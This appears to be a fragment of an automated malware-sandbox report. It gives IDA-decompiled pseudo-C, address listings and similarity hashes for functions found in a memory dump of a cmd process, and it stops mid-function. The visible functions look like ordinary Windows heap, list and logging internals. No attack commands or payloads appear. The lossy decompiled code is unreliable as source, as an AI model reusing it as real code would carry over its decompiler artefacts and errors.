                                                                                                                                          0x03c3375c
                                                                                                                                          0x03c3375c
                                                                                                                                          0x03c3375e
                                                                                                                                          0x03c3375e
                                                                                                                                          0x03c33761
                                                                                                                                          0x03c33764
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33766
                                                                                                                                          0x03c33768
                                                                                                                                          0x03c337a3
                                                                                                                                          0x03c337a3
                                                                                                                                          0x03c337a5
                                                                                                                                          0x03c337a7
                                                                                                                                          0x03c337ad
                                                                                                                                          0x03c337b0
                                                                                                                                          0x03c337b2
                                                                                                                                          0x03c337bc
                                                                                                                                          0x03c337c2
                                                                                                                                          0x03c337c2
                                                                                                                                          0x03c337b2
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd918a
                                                                                                                                          0x03bd918d
                                                                                                                                          0x03bd918f
                                                                                                                                          0x03bd9192
                                                                                                                                          0x03bd9195
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9195
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03c3376a
                                                                                                                                          0x03c3376a
                                                                                                                                          0x03c3376c
                                                                                                                                          0x03c3376c
                                                                                                                                          0x03c3376f
                                                                                                                                          0x03c33775
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33777
                                                                                                                                          0x03c33779
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33782
                                                                                                                                          0x03c33787
                                                                                                                                          0x03c33789
                                                                                                                                          0x03c33790
                                                                                                                                          0x03c33790
                                                                                                                                          0x03c3378b
                                                                                                                                          0x03c3378b
                                                                                                                                          0x03c3378b
                                                                                                                                          0x03c33792
                                                                                                                                          0x03c33795
                                                                                                                                          0x03c33795
                                                                                                                                          0x03c33798
                                                                                                                                          0x03c33798
                                                                                                                                          0x03c3379b
                                                                                                                                          0x03c3379b
                                                                                                                                          0x03bd91a3
                                                                                                                                          0x03bd91a9
                                                                                                                                          0x03bd91b0
                                                                                                                                          0x03bd91b4
                                                                                                                                          0x03bd91b4
                                                                                                                                          0x03bd91bb
                                                                                                                                          0x03bd91c0
                                                                                                                                          0x03bd91c5
                                                                                                                                          0x03bd91c7
                                                                                                                                          0x03c337da
                                                                                                                                          0x03bd91cd
                                                                                                                                          0x03bd91cd
                                                                                                                                          0x03bd91cd
                                                                                                                                          0x03bd91d2
                                                                                                                                          0x03bd91d5
                                                                                                                                          0x03bd9239
                                                                                                                                          0x03bd9239
                                                                                                                                          0x03bd91d7
                                                                                                                                          0x03bd91db
                                                                                                                                          0x03bd91e1
                                                                                                                                          0x03bd91e7
                                                                                                                                          0x03bd91fd
                                                                                                                                          0x03bd9203
                                                                                                                                          0x03bd921e
                                                                                                                                          0x03bd9223
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9223
                                                                                                                                          0x03bd9205
                                                                                                                                          0x03bd9208
                                                                                                                                          0x03bd920c
                                                                                                                                          0x03bd9214
                                                                                                                                          0x03bd9214
                                                                                                                                          0x03bd91e9
                                                                                                                                          0x03bd91e9
                                                                                                                                          0x03bd91ee
                                                                                                                                          0x03bd91f3
                                                                                                                                          0x03bd91f3
                                                                                                                                          0x03bd91f3
                                                                                                                                          0x03bd91e7
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd91db
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd9168

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7f017584ff321ca1032a9a95d80e790114c8568c8cb23bbd1d7ccf9501834627
                                                                                                                                          • Instruction ID: b44a3f0db142b3c5b1d750ceb3f9398741a7d688e5fc5daa6a557068d5799cd6
                                                                                                                                          • Opcode Fuzzy Hash: 7f017584ff321ca1032a9a95d80e790114c8568c8cb23bbd1d7ccf9501834627
                                                                                                                                          • Instruction Fuzzy Hash: B831C179A01785EFDB25DF68C588BADBBB1BB49318F1981E9C415EB241E330A980CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C01DB5 Relevance: .1, Instructions: 87COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                          			E03C01DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E03BFF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03BF4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E03BFF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                                                          0x03c01dc2
                                                                                                                                          0x03c01dc5
                                                                                                                                          0x03c01dc7
                                                                                                                                          0x03c01dcc
                                                                                                                                          0x03c01dce
                                                                                                                                          0x03c01dd6
                                                                                                                                          0x03c01ddf
                                                                                                                                          0x03c01de0
                                                                                                                                          0x03c01de1
                                                                                                                                          0x03c01de5
                                                                                                                                          0x03c01de8
                                                                                                                                          0x03c01def
                                                                                                                                          0x03c01df0
                                                                                                                                          0x03c01df6
                                                                                                                                          0x03c01df7
                                                                                                                                          0x03c01dfe
                                                                                                                                          0x03c01e1a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c01e0b
                                                                                                                                          0x03c01e12
                                                                                                                                          0x03c01e12
                                                                                                                                          0x03c01e00
                                                                                                                                          0x03c01e00
                                                                                                                                          0x03c01e05
                                                                                                                                          0x03c01e1e
                                                                                                                                          0x03c01e23
                                                                                                                                          0x03c4570f
                                                                                                                                          0x03c45713
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45719
                                                                                                                                          0x03c45719
                                                                                                                                          0x03c01e2c
                                                                                                                                          0x03c01e2d
                                                                                                                                          0x03c01e2e
                                                                                                                                          0x03c01e2f
                                                                                                                                          0x03c01e31
                                                                                                                                          0x03c01e32
                                                                                                                                          0x03c01e35
                                                                                                                                          0x03c01e3d
                                                                                                                                          0x03c45723
                                                                                                                                          0x03c4573d
                                                                                                                                          0x03c4573d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45723
                                                                                                                                          0x03c01e49
                                                                                                                                          0x03c01e4e
                                                                                                                                          0x03c01e4e
                                                                                                                                          0x03c01e09
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                          • Instruction ID: 6428b9c8a3ac1e6a90a1feff102f1d91ecd3456377ef2534d34ecd5191d65c7d
                                                                                                                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                          • Instruction Fuzzy Hash: F4218D3A600258AFC721CF99C884EAEFBB9EF85794F1940A5E911DB250D630AE41C7A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BF0050 Relevance: .1, Instructions: 81COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                          			E03BF0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x3ccd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03C09ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E03C1B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03CA8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03C09702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x3ccb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                                                          0x03bf0055
                                                                                                                                          0x03bf005d
                                                                                                                                          0x03bf0062
                                                                                                                                          0x03bf006c
                                                                                                                                          0x03bf006f
                                                                                                                                          0x03bf0074
                                                                                                                                          0x03bf007a
                                                                                                                                          0x03bf007a
                                                                                                                                          0x03bf0080
                                                                                                                                          0x03bf0080
                                                                                                                                          0x03bf0087
                                                                                                                                          0x03bf008d
                                                                                                                                          0x03bf008f
                                                                                                                                          0x03bf0093
                                                                                                                                          0x03bf0095
                                                                                                                                          0x03bf009b
                                                                                                                                          0x03bf00f8
                                                                                                                                          0x03bf00fb
                                                                                                                                          0x03bf00fc
                                                                                                                                          0x03bf00ff
                                                                                                                                          0x03bf0108
                                                                                                                                          0x03bf0108
                                                                                                                                          0x03bf00a2
                                                                                                                                          0x03bf00a6
                                                                                                                                          0x03bf00b3
                                                                                                                                          0x03bf00bc
                                                                                                                                          0x03bf00c5
                                                                                                                                          0x03bf00ca
                                                                                                                                          0x03c3c01e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3c02d
                                                                                                                                          0x03bf00d5
                                                                                                                                          0x03bf00d9
                                                                                                                                          0x03c3c03d
                                                                                                                                          0x03c3c046
                                                                                                                                          0x03c3c046
                                                                                                                                          0x03bf00df
                                                                                                                                          0x03bf00e2
                                                                                                                                          0x03bf00ea
                                                                                                                                          0x03bf00ef
                                                                                                                                          0x03bf00f2
                                                                                                                                          0x03bf00f6
                                                                                                                                          0x03bf0111
                                                                                                                                          0x03bf0117
                                                                                                                                          0x03bf0117
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf00f6
                                                                                                                                          0x03bf00d0
                                                                                                                                          0x03bf00d0
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ece94142f2e487e9ca7f98fabf7cbd7ea84dda07003cd31dbf8a115d09d2cc78
                                                                                                                                          • Instruction ID: 7c35bdbe9ef991653ee69dcb0f71c9d97ade1b0409817f2e6bf19572c485ffee
                                                                                                                                          • Opcode Fuzzy Hash: ece94142f2e487e9ca7f98fabf7cbd7ea84dda07003cd31dbf8a115d09d2cc78
                                                                                                                                          • Instruction Fuzzy Hash: 0F31BF31201B04CFD721DF28C844B9AB3E5FF89714F1845ADE596CB6A1DB35AC05DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C56C0A Relevance: .1, Instructions: 79COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                          			E03C56C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03BF7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3cc7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03BF4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E03C1F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03BF7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03C19AE0();
						_t23 = L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                                                          0x03c56c0a
                                                                                                                                          0x03c56c0f
                                                                                                                                          0x03c56c10
                                                                                                                                          0x03c56c13
                                                                                                                                          0x03c56c15
                                                                                                                                          0x03c56c19
                                                                                                                                          0x03c56c1c
                                                                                                                                          0x03c56c21
                                                                                                                                          0x03c56c28
                                                                                                                                          0x03c56c3a
                                                                                                                                          0x03c56c2a
                                                                                                                                          0x03c56c33
                                                                                                                                          0x03c56c33
                                                                                                                                          0x03c56c3f
                                                                                                                                          0x03c56c48
                                                                                                                                          0x03c56c4d
                                                                                                                                          0x03c56c60
                                                                                                                                          0x03c56c65
                                                                                                                                          0x03c56c69
                                                                                                                                          0x03c56c73
                                                                                                                                          0x03c56c79
                                                                                                                                          0x03c56c7f
                                                                                                                                          0x03c56c86
                                                                                                                                          0x03c56c90
                                                                                                                                          0x03c56c94
                                                                                                                                          0x03c56ca6
                                                                                                                                          0x03c56cb2
                                                                                                                                          0x03c56cbd
                                                                                                                                          0x03c56cbd
                                                                                                                                          0x03c56cc3
                                                                                                                                          0x03c56cc7
                                                                                                                                          0x03c56ccb
                                                                                                                                          0x03c56cd0
                                                                                                                                          0x03c56cd1
                                                                                                                                          0x03c56ce2
                                                                                                                                          0x03c56ce2
                                                                                                                                          0x03c56c69
                                                                                                                                          0x03c56ced

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9dc42133cbd4668008e7cfd334a5d31823a66788121022e885fbc0718fb0bf6e
                                                                                                                                          • Instruction ID: 34c865f1d97c6aab5b1636cba095dc69c946981d78e3ce0def37c0464b77f9a4
                                                                                                                                          • Opcode Fuzzy Hash: 9dc42133cbd4668008e7cfd334a5d31823a66788121022e885fbc0718fb0bf6e
                                                                                                                                          • Instruction Fuzzy Hash: 5E219FB5600644AFC715DF69D840F6AB7B8FF48744F1400A9F904DB791DA34ED50CBA8
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C190AF Relevance: .1, Instructions: 76COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			E03C190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E03C2D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E03C0E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03BF4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E03C1F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E03C0A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                                                          0x03c190af
                                                                                                                                          0x03c190b8
                                                                                                                                          0x03c190bb
                                                                                                                                          0x03c190bf
                                                                                                                                          0x03c190c2
                                                                                                                                          0x03c190c2
                                                                                                                                          0x03c190c8
                                                                                                                                          0x03c190cb
                                                                                                                                          0x03c190cd
                                                                                                                                          0x03c514d7
                                                                                                                                          0x03c514eb
                                                                                                                                          0x03c514eb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c514eb
                                                                                                                                          0x03c514db
                                                                                                                                          0x03c514e6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c514f2
                                                                                                                                          0x03c514e8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c514e8
                                                                                                                                          0x03c190d8
                                                                                                                                          0x03c190da
                                                                                                                                          0x03c190dd
                                                                                                                                          0x03c190e5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c19139
                                                                                                                                          0x03c190fa
                                                                                                                                          0x03c190fe
                                                                                                                                          0x03c19142
                                                                                                                                          0x00000000
                                                                                                                                          0x03c19142
                                                                                                                                          0x03c19104
                                                                                                                                          0x03c19107
                                                                                                                                          0x03c1910b
                                                                                                                                          0x03c19110
                                                                                                                                          0x03c19118
                                                                                                                                          0x03c19147
                                                                                                                                          0x03c19148
                                                                                                                                          0x03c1914f
                                                                                                                                          0x03c19150
                                                                                                                                          0x03c19151
                                                                                                                                          0x03c19152
                                                                                                                                          0x03c19156
                                                                                                                                          0x03c1915d
                                                                                                                                          0x03c19160
                                                                                                                                          0x03c19168
                                                                                                                                          0x03c1916c
                                                                                                                                          0x03c191bc
                                                                                                                                          0x03c191be
                                                                                                                                          0x00000000
                                                                                                                                          0x03c191be
                                                                                                                                          0x03c1916e
                                                                                                                                          0x03c19173
                                                                                                                                          0x03c19176
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c1917c
                                                                                                                                          0x03c19180
                                                                                                                                          0x03c191b5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c191b5
                                                                                                                                          0x03c19182
                                                                                                                                          0x03c19185
                                                                                                                                          0x03c19189
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c1918e
                                                                                                                                          0x03c19190
                                                                                                                                          0x03c19198
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c191a0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c191ad
                                                                                                                                          0x03c191ad
                                                                                                                                          0x03c191b0
                                                                                                                                          0x03c191b1
                                                                                                                                          0x00000000
                                                                                                                                          0x03c19185
                                                                                                                                          0x03c1911a
                                                                                                                                          0x03c1911c
                                                                                                                                          0x03c1911f
                                                                                                                                          0x03c19125
                                                                                                                                          0x03c19127
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                          • Instruction ID: 54803a394df10316cfe2564f6ce8be745c9539118bbefb130931512372512856
                                                                                                                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                          • Instruction Fuzzy Hash: 1F219575A00304EFDB21DF55C444E5AF7F8EB44310F1588AAE945DB240D331EE54EB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C03B7A Relevance: .1, Instructions: 75COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                          			E03C03B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x3cc84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x3cc84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x3cc84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E03C1AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E03C1FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x3cc84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x3cc84c4; // 0x0
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                                                          0x03c03b89
                                                                                                                                          0x03c03b96
                                                                                                                                          0x03c03ba1
                                                                                                                                          0x03c03bab
                                                                                                                                          0x03c03bb5
                                                                                                                                          0x03c03bb9
                                                                                                                                          0x03c46298
                                                                                                                                          0x03c03bbf
                                                                                                                                          0x03c03bc2
                                                                                                                                          0x03c03bc3
                                                                                                                                          0x03c03bc9
                                                                                                                                          0x03c03bca
                                                                                                                                          0x03c03bcc
                                                                                                                                          0x03c03bcd
                                                                                                                                          0x03c03bd4
                                                                                                                                          0x03c03bd6
                                                                                                                                          0x03c03bdb
                                                                                                                                          0x03c03bea
                                                                                                                                          0x03c03bf7
                                                                                                                                          0x03c03bfb
                                                                                                                                          0x03c03bff
                                                                                                                                          0x03c03c09
                                                                                                                                          0x03c03c0a
                                                                                                                                          0x03c03c0b
                                                                                                                                          0x03c03c0f
                                                                                                                                          0x03c03c14
                                                                                                                                          0x03c03c18
                                                                                                                                          0x03c03c18
                                                                                                                                          0x03c03bfb
                                                                                                                                          0x03c03c1b
                                                                                                                                          0x03c03c30
                                                                                                                                          0x03c03c30
                                                                                                                                          0x03c03c3d

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fc12b25732f53a66b9d90edd0a2c6958cd85fbadc0cda2bdb45f18e66ac2e79b
                                                                                                                                          • Instruction ID: 51a8787ac29bb610c5e9a53366321e2c78c049c5530f62ecee18853555c02a87
                                                                                                                                          • Opcode Fuzzy Hash: fc12b25732f53a66b9d90edd0a2c6958cd85fbadc0cda2bdb45f18e66ac2e79b
                                                                                                                                          • Instruction Fuzzy Hash: 17219F76A00248AFC700DF58CD81BAAB7BDFB45748F1501A8E909EB251D771ED15DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C56CF0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                          			E03C56CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03BF7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03BF7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
